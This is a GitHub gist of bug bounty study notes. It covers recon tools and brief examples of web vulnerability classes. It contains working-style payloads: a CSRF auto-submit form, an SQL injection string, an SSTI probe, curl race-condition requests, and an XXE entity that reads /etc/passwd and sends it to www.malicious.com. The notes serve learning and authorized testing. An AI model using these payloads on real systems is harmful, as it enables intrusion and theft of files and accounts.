Created
October 22, 2019 14:01
-
-
Save DShankle/0d12ff759902568e7b7b5228bf77f4df to your computer and use it in GitHub Desktop.
Web Hacking Notes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _______________LevelUp 0x02 - Bug Bounty Hunter Methodology v3_______________ | |
| --IP Space-- | |
| Find IP range by keyword: | |
| http://bgp.he.net | |
| Registered IP's and Domains: | |
| https://whois.arin.net/ui/query.do | |
| https://apps.db.ripe.net/db-web-ui/#/fulltextsearch | |
| Shodan: | |
| org:"organization name" | |
| --Brands and Top Level Domains-- | |
| Aquisitions: | |
| Wikipedia | |
| Crunchbase | |
| Spider: | |
| Burp > Use advanced scope control > keyword | |
| #Domlink - recursive DNS search based on registrar | |
| Google dork for trademark | |
| --Subdomains-- | |
| Scraping: | |
| amass | |
| subfinder | |
| Bruting: | |
| massdns | |
| all.txt | |
| https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056 | |
| Esoteric: | |
| nsec3 walking | |
| --Enumeration-- | |
| Port scan: | |
| masscan | |
| eyewitness | |
| archive.org/web/ | |
| https://github.com/tomnomnom/waybackurls | |
| --Organization-- | |
| xmind | |
| --Stack-- | |
| Builtwith - find technology stack | |
| wappalyzer | |
| retire.js | |
| --Parsing JavaScript-- | |
| ZAP AJAX Spider | |
| LinkFinder | |
| --Content Discovery-- | |
| gobuster | |
| https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10 | |
| Parameter Bruting: | |
| parameth | |
| --XSS-- | |
| bXSS | |
| ezXSS | |
| --Cloud SSRF-- | |
| https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b | |
| --Subdomain Takeover-- | |
| can-i-take-over-xyz | |
| --AWS Robbing-- | |
| S3Scanner | |
| ________________________________Web Hacking 101________________________________ | |
| Open Redirect Vulnerabilities: | |
| https://app.shopify.com/services/google/themes/preview/supply-blue?domain_name=example.com | |
| http://mystore.myshopify.com/account/login?checkout_url=.np - mystore.myshopify.com.np | |
| HTTP Parameter Pollution: | |
| POST method parameters: | |
| amount=1000&fromAccount=12345 | |
| Separate back end Parameters: | |
| toAccount=9876&amount=1000&fromAccount=12345 | |
| Altered POST method parameters: | |
| amount=1000&fromAccount=12345&toAccount=99999 | |
| If the backend then prepends toAccount and only takes the last parameter when duplicates are provided, it will be overided by the malicious account. | |
| Cross-Site Request Forgery: | |
| <html> | |
| <body onload="document.forms[0].submit()"> | |
| <form action="https://app.shopify.com/services/partners/api_clients/1105664/\export_installed-users"method="GET"></form> | |
| </body> | |
| <html> | |
| HTML Injection: | |
| https://withinsecurity.com/wp-login.php?error=access_denied | |
| https://withinsecurity.com/wp-login.php?error=Your%20account%20was%20hacked | |
| CRLF Injection: | |
| Cross-Site Scripting: | |
| https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet | |
| Template Injection: | |
| https://developer.uber.com/docs/deep-linking?q=wrtz{{7*7}} | |
| SQL Injection: | |
| test' OR 1=1;-- | |
| Server Side Request Forgery: | |
| https://play.esea.net/global/media_preview.php?url=http://example.com/?1.png | |
| #AWS metadata query url: | |
| http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html | |
| XML External Entity Vulnerability: | |
| <?xml version="1.0" encoding="ISO-8859-1"?> | |
| <!DOCTYPE foo [ | |
| <!ELEMENT foo ANY> | |
| <!ENTITY %xxe SYSTEM "file:///etc/passwd"> | |
| <!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;"> | |
| ] | |
| > | |
| <foo>&callhome;</foo> | |
| Sub Domain Takeover: | |
| example.com creates a DNS entry pointing subdomain.example.com to unicorn457.heroku.com but unicorn457 was never claimed | |
| Race Conditions: | |
| #prepare transfer details in both sessions | |
| curl starbucks/step1 -H <<Cookie: session=sessions1>> --data <<amount=1&fromwallet1&to=wallet2>> | |
| curl starbucks/step1 -H <<Cookie: session=sessions2>> --data <<amount=1&fromwallet1&to=wallet2>> | |
| #send $1 simultaneously from wallet 1 to wallet 2 using both sessions | |
| curl starbucks/step2?confirm -H <<Cookie: session=session1>> & curl starbucks/step2?confirm -H <<Cookie:session2>> & | |
| Insecure Direct Object References: | |
| #your private profile | |
| www.site.com/user=123 | |
| #you are now viewing someone else's private profile | |
| www.site.com/user=124 | |
| OAuth: | |
| First check to see if the resource server will return a token rather than a code. If so check to see if the return address can be modified to a different domain, or an attacker controlled page like www.example.com/attacker-controlled. | |
| If the latter then combine with open redirect, xss, or a remote image you inclusion. If open redirect or remote image token will be in the referrer header. If XSS, send it to your server. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment